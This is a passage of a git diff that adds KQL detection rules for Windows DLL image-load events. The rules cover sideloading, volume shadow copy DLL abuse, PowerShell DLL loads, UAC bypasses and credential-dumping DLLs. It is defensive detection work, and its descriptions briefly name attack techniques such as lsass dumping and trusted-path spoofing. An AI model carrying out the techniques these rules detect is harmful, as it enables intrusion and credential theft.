InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CheckPoint\\")) or (FolderPath startswith "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" or InitiatingProcessFolderPath contains "C:\\Windows\\System32\\backgroundTaskHost.exe")) or (InitiatingProcessFolderPath endswith "\\wldp.dll" and InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs") or (FolderPath endswith "\\mswb7.dll" and FolderPath startswith "C:\\Program Files\\Microsoft\\Exchange Server\\") or (InitiatingProcessFolderPath =~ "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe" and FolderPath =~ "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_vivaldi_elf_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_vivaldi_elf_dll_sideloading.kql
new file mode 100644
index 00000000..88457514
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_vivaldi_elf_dll_sideloading.kql
@@ -0,0 +1,10 @@
+// Title: Potential Vivaldi_elf.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-08-03
+// Level: medium
+// Description: Detects potential DLL sideloading of "vivaldi_elf.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\vivaldi_elf.dll" and (not((FolderPath contains "\\Vivaldi\\Application\\" and InitiatingProcessFolderPath endswith "\\Vivaldi\\Application\\vivaldi.exe")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_waveedit_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_waveedit_dll_sideloading.kql
new file mode 100644
index 00000000..5b2c2e23
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_waveedit_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential Waveedit.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-06-14
+// Level: high
+// Description: Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+//   - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\waveedit.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe", "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\" or FolderPath startswith "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_wazuh_security_platform_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_wazuh_security_platform_dll_sideloading.kql
new file mode 100644
index 00000000..37b7fd37
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_wazuh_security_platform_dll_sideloading.kql
@@ -0,0 +1,12 @@
+// Title: Potential Wazuh Security Platform DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-03-13
+// Level: medium
+// Description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+// False Positives:
+//   - Many legitimate applications leverage this DLL. (Visual Studio, JetBrains, Ruby, Anaconda, GithubDesktop, etc.)
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\libwazuhshared.dll" or FolderPath endswith "\\libwinpthread-1.dll") and (not((FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Program Files (x86)\\"))) and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\ProgramData\\") and FolderPath endswith "\\mingw64\\bin\\libwinpthread-1.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potential_wwlib_dll_sideloading.kql b/KQL/rules/windows/image_load/potential_wwlib_dll_sideloading.kql
new file mode 100644
index 00000000..cdc912b1
--- /dev/null
+++ b/KQL/rules/windows/image_load/potential_wwlib_dll_sideloading.kql
@@ -0,0 +1,10 @@
+// Title: Potential WWlib.DLL Sideloading
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-05-18
+// Level: medium
+// Description: Detects potential DLL sideloading of "wwlib.dll"
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\wwlib.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\") and InitiatingProcessFolderPath endswith "\\winword.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql b/KQL/rules/windows/image_load/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql
new file mode 100644
index 00000000..8b175607
--- /dev/null
+++ b/KQL/rules/windows/image_load/potentially_suspicious_volume_shadow_copy_vsstrace_dll_load.kql
@@ -0,0 +1,10 @@
+// Title: Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load
+// Author: frack113
+// Date: 2023-02-17
+// Level: medium
+// Description: Detects the image load of VSS DLL by uncommon executables
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.impact, attack.t1490
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\vsstrace.dll" and (not((isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache\\{"))))) and (not(((InitiatingProcessFolderPath contains "\\temp\\is-" and InitiatingProcessFolderPath contains "\\avira_system_speedup.tmp") or InitiatingProcessFolderPath startswith "C:\\$WinREAgent\\Scratch\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/powershell_core_dll_loaded_by_non_powershell_process.kql b/KQL/rules/windows/image_load/powershell_core_dll_loaded_by_non_powershell_process.kql
new file mode 100644
index 00000000..87303c9b
--- /dev/null
+++ b/KQL/rules/windows/image_load/powershell_core_dll_loaded_by_non_powershell_process.kql
@@ -0,0 +1,14 @@
+// Title: PowerShell Core DLL Loaded By Non PowerShell Process
+// Author: Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2019-11-14
+// Level: medium
+// Description: Detects loading of essential DLLs used by PowerShell by non-PowerShell process.
+// Detects behavior similar to meterpreter's "load powershell" extension.
+// MITRE Tactic: Execution
+// Tags: attack.t1059.001, attack.execution
+// False Positives:
+//   - Used by some .NET binaries, minimal on user workstation.
+//   - Used by Microsoft SQL Server Management Studio
+
+DeviceImageLoadEvents
+| where (InitiatingProcessVersionInfoFileDescription =~ "System.Management.Automation" or InitiatingProcessVersionInfoOriginalFileName =~ "System.Management.Automation.dll" or (FolderPath endswith "\\System.Management.Automation.dll" or FolderPath endswith "\\System.Management.Automation.ni.dll")) and (not(((InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\")) or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\dsac.exe", "C:\\WINDOWS\\System32\\RemoteFXvGPUDisablement.exe", "C:\\Windows\\System32\\runscripthelper.exe", "C:\\WINDOWS\\System32\\sdiagnhost.exe", "C:\\Windows\\System32\\ServerManager.exe", "C:\\Windows\\System32\\SyncAppvPublishingServer.exe", "C:\\Windows\\System32\\winrshost.exe", "C:\\Windows\\System32\\wsmprovhost.exe", "C:\\Windows\\SysWOW64\\winrshost.exe", "C:\\Windows\\SysWOW64\\wsmprovhost.exe")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")) or ((InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\Microsoft.PowerShellPreview" or InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\WindowsApps\\Microsoft.PowerShellPreview") and InitiatingProcessFolderPath endswith "\\pwsh.exe")))) and (not((isnull(InitiatingProcessFolderPath) or InitiatingProcessFolderPath startswith "C:\\ProgramData\\chocolatey\\choco.exe" or InitiatingProcessFolderPath endswith "\\Citrix\\ConfigSync\\ConfigSyncRun.exe" or ((InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\thor.exe") and InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\asgard2-agent\\") or (InitiatingProcessFolderPath endswith "\\IDE\\Ssms.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft SQL Server Management Studio" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server Management Studio")) or (InitiatingProcessFolderPath endswith "\\Tools\\Binn\\SQLPS.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft SQL Server\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft SQL Server\\")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Visual Studio\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Visual Studio\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/powershell_core_dll_loaded_via_office_application.kql b/KQL/rules/windows/image_load/powershell_core_dll_loaded_via_office_application.kql
new file mode 100644
index 00000000..75f7bca4
--- /dev/null
+++ b/KQL/rules/windows/image_load/powershell_core_dll_loaded_via_office_application.kql
@@ -0,0 +1,10 @@
+// Title: PowerShell Core DLL Loaded Via Office Application
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-06-01
+// Level: medium
+// Description: Detects PowerShell core DLL being loaded by an Office Product
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion
+
+DeviceImageLoadEvents
+| where (FolderPath contains "\\System.Management.Automation.Dll" or FolderPath contains "\\System.Management.Automation.ni.Dll") and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/python_image_load_by_non_python_process.kql b/KQL/rules/windows/image_load/python_image_load_by_non_python_process.kql
new file mode 100644
index 00000000..b927676d
--- /dev/null
+++ b/KQL/rules/windows/image_load/python_image_load_by_non_python_process.kql
@@ -0,0 +1,16 @@
+// Title: Python Image Load By Non-Python Process
+// Author: Patrick St. John, OTR (Open Threat Research)
+// Date: 2020-05-03
+// Level: low
+// Description: Detects the image load of "Python Core" by a non-Python process. This might be indicative of a execution of executable that has been bundled from Python code.
+// Various tools like Py2Exe, PyInstaller, and cx_Freeze are used to bundle Python code into standalone executables.
+// Threat actors often use these tools to bundle malicious Python scripts into executables, sometimes to obfuscate the code or to bypass security measures.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1027.002
+// False Positives:
+//   - Legitimate Py2Exe Binaries
+//   - Known false positive caused with Python Anaconda
+//   - Various legitimate software is bundled from Python code into executables
+
+DeviceImageLoadEvents
+| where InitiatingProcessVersionInfoFileDescription =~ "Python Core" and (not((InitiatingProcessFolderPath contains "Python" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Anaconda3\\")))) and (not(isnull(InitiatingProcessFolderPath)))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/remote_dll_load_via_rundll32_exe.kql b/KQL/rules/windows/image_load/remote_dll_load_via_rundll32_exe.kql
new file mode 100644
index 00000000..df73b109
--- /dev/null
+++ b/KQL/rules/windows/image_load/remote_dll_load_via_rundll32_exe.kql
@@ -0,0 +1,10 @@
+// Title: Remote DLL Load Via Rundll32.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-09-18
+// Level: medium
+// Description: Detects a remote DLL load event via "rundll32.exe".
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1204.002
+
+DeviceImageLoadEvents
+| where FolderPath startswith "\\\\" and InitiatingProcessFolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/suspicious_loading_of_dbgcore_dbghelp_dlls_from_uncommon_location.kql b/KQL/rules/windows/image_load/suspicious_loading_of_dbgcore_dbghelp_dlls_from_uncommon_location.kql
new file mode 100644
index 00000000..598ad00e
--- /dev/null
+++ b/KQL/rules/windows/image_load/suspicious_loading_of_dbgcore_dbghelp_dlls_from_uncommon_location.kql
@@ -0,0 +1,13 @@
+// Title: Suspicious Loading of Dbgcore/Dbghelp DLLs from Uncommon Location
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-11-27
+// Level: high
+// Description: Detects loading of dbgcore.dll or dbghelp.dll from uncommon locations such as user directories.
+// These DLLs contain the MiniDumpWriteDump function, which can be abused for credential dumping purposes or in some cases for evading EDR/AV detection by suspending processes.
+// MITRE Tactic: Credential Access
+// Tags: attack.credential-access, attack.t1003, attack.defense-evasion, attack.t1562.001
+// False Positives:
+//   - Possibly during software installation or update processes
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\dbgcore.dll" or FolderPath endswith "\\dbghelp.dll") and (InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Temp\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\$Recycle.Bin\\" or InitiatingProcessFolderPath contains "\\Contacts\\" or InitiatingProcessFolderPath contains "\\Desktop\\" or InitiatingProcessFolderPath contains "\\Documents\\" or InitiatingProcessFolderPath contains "\\Downloads\\" or InitiatingProcessFolderPath contains "\\Favorites\\" or InitiatingProcessFolderPath contains "\\Favourites\\" or InitiatingProcessFolderPath contains "\\inetpub\\wwwroot\\" or InitiatingProcessFolderPath contains "\\Music\\" or InitiatingProcessFolderPath contains "\\Pictures\\" or InitiatingProcessFolderPath contains "\\Start Menu\\Programs\\Startup\\" or InitiatingProcessFolderPath contains "\\Users\\Default\\" or InitiatingProcessFolderPath contains "\\Videos\\")
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/suspicious_volume_shadow_copy_vss_ps_dll_load.kql b/KQL/rules/windows/image_load/suspicious_volume_shadow_copy_vss_ps_dll_load.kql
new file mode 100644
index 00000000..8852defd
--- /dev/null
+++ b/KQL/rules/windows/image_load/suspicious_volume_shadow_copy_vss_ps_dll_load.kql
@@ -0,0 +1,12 @@
+// Title: Suspicious Volume Shadow Copy VSS_PS.dll Load
+// Author: Markus Neis, @markus_neis
+// Date: 2021-07-07
+// Level: high
+// Description: Detects the image load of vss_ps.dll by uncommon executables. This DLL is used by the Volume Shadow Copy Service (VSS) to manage shadow copies of files and volumes.
+// It is often abused by attackers to delete or manipulate shadow copies, which can hinder forensic investigations and data recovery efforts.
+// The fact that it is loaded by processes that are not typically associated with VSS operations can indicate suspicious activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.impact, attack.t1490
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\vss_ps.dll" and (not((isnull(InitiatingProcessFolderPath) or ((InitiatingProcessFolderPath endswith "\\clussvc.exe" or InitiatingProcessFolderPath endswith "\\dismhost.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\appcmd.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\iissetup.exe" or InitiatingProcessFolderPath endswith "\\msiexec.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\searchindexer.exe" or InitiatingProcessFolderPath endswith "\\srtasks.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\System32\\SystemPropertiesAdvanced.exe" or InitiatingProcessFolderPath endswith "\\taskhostw.exe" or InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\tiworker.exe" or InitiatingProcessFolderPath endswith "\\vssvc.exe" or InitiatingProcessFolderPath endswith "\\vssadmin.exe" or InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith "\\wsmprovhost.exe") and InitiatingProcessFolderPath startswith "C:\\Windows\\") or (InitiatingProcessCommandLine contains "\\dismhost.exe {" and InitiatingProcessCommandLine startswith "C:\\$WinREAgent\\Scratch\\")))) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/suspicious_volume_shadow_copy_vssapi_dll_load.kql b/KQL/rules/windows/image_load/suspicious_volume_shadow_copy_vssapi_dll_load.kql
new file mode 100644
index 00000000..72721a75
--- /dev/null
+++ b/KQL/rules/windows/image_load/suspicious_volume_shadow_copy_vssapi_dll_load.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious Volume Shadow Copy Vssapi.dll Load
+// Author: frack113
+// Date: 2022-10-31
+// Level: high
+// Description: Detects the image load of VSS DLL by uncommon executables
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.impact, attack.t1490
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\vssapi.dll" and (not((isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\"))))) and (not(((InitiatingProcessFolderPath contains "\\temp\\is-" and InitiatingProcessFolderPath contains "\\avira_system_speedup.tmp") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/suspicious_wsman_provider_image_loads.kql b/KQL/rules/windows/image_load/suspicious_wsman_provider_image_loads.kql
new file mode 100644
index 00000000..3bf781cb
--- /dev/null
+++ b/KQL/rules/windows/image_load/suspicious_wsman_provider_image_loads.kql
@@ -0,0 +1,10 @@
+// Title: Suspicious WSMAN Provider Image Loads
+// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
+// Date: 2020-06-24
+// Level: medium
+// Description: Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.001, attack.lateral-movement, attack.t1021.003
+
+DeviceImageLoadEvents
+| where (((FolderPath endswith "\\WsmSvc.dll" or FolderPath endswith "\\WsmAuto.dll" or FolderPath endswith "\\Microsoft.WSMan.Management.ni.dll") or (InitiatingProcessVersionInfoOriginalFileName in~ ("WsmSvc.dll", "WSMANAUTOMATION.DLL", "Microsoft.WSMan.Management.dll"))) or (InitiatingProcessFolderPath endswith "\\svchost.exe" and InitiatingProcessVersionInfoOriginalFileName =~ "WsmWmiPl.dll")) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\Citrix\\" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\PowerShell\\6\\pwsh.exe", "C:\\Program Files (x86)\\PowerShell\\7\\pwsh.exe", "C:\\Program Files\\PowerShell\\6\\pwsh.exe", "C:\\Program Files\\PowerShell\\7\\pwsh.exe", "C:\\Windows\\System32\\sdiagnhost.exe", "C:\\Windows\\System32\\services.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe")) or InitiatingProcessFolderPath endswith "\\mmc.exe" or (InitiatingProcessFolderPath endswith "\\mscorsvw.exe" and (InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework64\\v" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\Framework\\v" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm\\v" or InitiatingProcessFolderPath startswith "C:\\Windows\\Microsoft.NET\\FrameworkArm64\\v")) or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\asgard2-agent\\" or (InitiatingProcessCommandLine contains "svchost.exe -k netsvcs -p -s BITS" or InitiatingProcessCommandLine contains "svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc" or InitiatingProcessCommandLine contains "svchost.exe -k NetworkService -p -s Wecsvc" or InitiatingProcessCommandLine contains "svchost.exe -k netsvcs") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\Configure-SMRemoting.exe", "C:\\Windows\\System32\\ServerManager.exe")) or InitiatingProcessFolderPath startswith "C:\\$WINDOWS.~BT\\Sources\\"))) and (not((InitiatingProcessFolderPath endswith "\\svchost.exe" and isnull(InitiatingProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/system_control_panel_item_loaded_from_uncommon_location.kql b/KQL/rules/windows/image_load/system_control_panel_item_loaded_from_uncommon_location.kql
new file mode 100644
index 00000000..667c079f
--- /dev/null
+++ b/KQL/rules/windows/image_load/system_control_panel_item_loaded_from_uncommon_location.kql
@@ -0,0 +1,10 @@
+// Title: System Control Panel Item Loaded From Uncommon Location
+// Author: Anish Bogati
+// Date: 2024-01-09
+// Level: medium
+// Description: Detects image load events of system control panel items (.cpl) from uncommon or non-system locations which might be the result of sideloading.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1036
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\hdwwiz.cpl" or FolderPath endswith "\\appwiz.cpl") and (not((FolderPath contains ":\\Windows\\System32\\" or FolderPath contains ":\\Windows\\SysWOW64\\" or FolderPath contains ":\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/third_party_software_dll_sideloading.kql b/KQL/rules/windows/image_load/third_party_software_dll_sideloading.kql
new file mode 100644
index 00000000..f9c3f0a9
--- /dev/null
+++ b/KQL/rules/windows/image_load/third_party_software_dll_sideloading.kql
@@ -0,0 +1,10 @@
+// Title: Third Party Software DLL Sideloading
+// Author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
+// Date: 2022-08-17
+// Level: medium
+// Description: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\commfunc.dll" and (not((FolderPath contains "\\AppData\\local\\Google\\Chrome\\Application\\" or (FolderPath startswith "C:\\Program Files\\Lenovo\\Communications Utility\\" or FolderPath startswith "C:\\Program Files (x86)\\Lenovo\\Communications Utility\\"))))) or (FolderPath endswith "\\tosbtkbd.dll" and (not((FolderPath startswith "C:\\Program Files\\Toshiba\\Bluetooth Toshiba Stack\\" or FolderPath startswith "C:\\Program Files (x86)\\Toshiba\\Bluetooth Toshiba Stack\\"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/time_travel_debugging_utility_usage_image.kql b/KQL/rules/windows/image_load/time_travel_debugging_utility_usage_image.kql
new file mode 100644
index 00000000..8320f98e
--- /dev/null
+++ b/KQL/rules/windows/image_load/time_travel_debugging_utility_usage_image.kql
@@ -0,0 +1,12 @@
+// Title: Time Travel Debugging Utility Usage - Image
+// Author: Ensar Şamil, @sblmsrsn, @oscd_initiative
+// Date: 2020-10-06
+// Level: high
+// Description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.credential-access, attack.t1218, attack.t1003.001
+// False Positives:
+//   - Legitimate usage by software developers/testers
+
+DeviceImageLoadEvents
+| where FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\ttdwriter.dll" or FolderPath endswith "\\ttdloader.dll"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/trusted_path_bypass_via_windows_directory_spoofing.kql b/KQL/rules/windows/image_load/trusted_path_bypass_via_windows_directory_spoofing.kql
new file mode 100644
index 00000000..34402445
--- /dev/null
+++ b/KQL/rules/windows/image_load/trusted_path_bypass_via_windows_directory_spoofing.kql
@@ -0,0 +1,13 @@
+// Title: Trusted Path Bypass via Windows Directory Spoofing
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-06-17
+// Level: high
+// Description: Detects DLLs loading from a spoofed Windows directory path with an extra space (e.g "C:\Windows \System32") which can bypass Windows trusted path verification.
+// This technique tricks Windows into treating the path as trusted, allowing malicious DLLs to load with high integrity privileges bypassing UAC.
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1574.007, attack.t1548.002
+// False Positives:
+//   - Unlikely
+
+DeviceImageLoadEvents
+| where FolderPath contains ":\\Windows \\System32\\" or FolderPath contains ":\\Windows \\SysWOW64\\"
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/uac_bypass_using_iscsicpl_imageload.kql b/KQL/rules/windows/image_load/uac_bypass_using_iscsicpl_imageload.kql
new file mode 100644
index 00000000..34e30f70
--- /dev/null
+++ b/KQL/rules/windows/image_load/uac_bypass_using_iscsicpl_imageload.kql
@@ -0,0 +1,10 @@
+// Title: UAC Bypass Using Iscsicpl - ImageLoad
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-07-17
+// Level: high
+// Description: Detects the "iscsicpl.exe" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.privilege-escalation, attack.t1548.002
+
+DeviceImageLoadEvents
+| where (InitiatingProcessFolderPath =~ "C:\\Windows\\SysWOW64\\iscsicpl.exe" and FolderPath endswith "\\iscsiexe.dll") and (not((FolderPath contains "C:\\Windows\\" and FolderPath contains "iscsiexe.dll")))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/uac_bypass_with_fake_dll.kql b/KQL/rules/windows/image_load/uac_bypass_with_fake_dll.kql
new file mode 100644
index 00000000..22219519
--- /dev/null
+++ b/KQL/rules/windows/image_load/uac_bypass_with_fake_dll.kql
@@ -0,0 +1,12 @@
+// Title: UAC Bypass With Fake DLL
+// Author: oscd.community, Dmitry Uchakin
+// Date: 2020-10-06
+// Level: high
+// Description: Attempts to load dismcore.dll after dropping it
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, attack.defense-evasion, attack.privilege-escalation, attack.t1548.002, attack.t1574.001
+// False Positives:
+//   - Actions of a legitimate telnet client
+
+DeviceImageLoadEvents
+| where (FolderPath endswith "\\dismcore.dll" and InitiatingProcessFolderPath endswith "\\dism.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\Dism\\dismcore.dll"))
\ No newline at end of file
diff --git a/KQL/rules/windows/image_load/vba_dll_loaded_via_office_application.kql b/KQL/rules/windows/image_load/vba_dll_loaded_via_office_application.kql
new file mode 100644
index 00000000..cb302d18
--- /dev/null
+++ b/KQL/rules/windows/image_load/vba_dll_loaded_via_office_application.kql
@@ -0,0 +1,12 @@
+// Title: VBA DLL Loaded Via Office Application
+// Author: Antonlovesdnb
+// Date: 2020-02-19
+// Level: high
+// Description: Detects VB DLL's loaded by an office application. Which could indicate the presence of VBA Macros.
+// MITRE Tactic: Execution
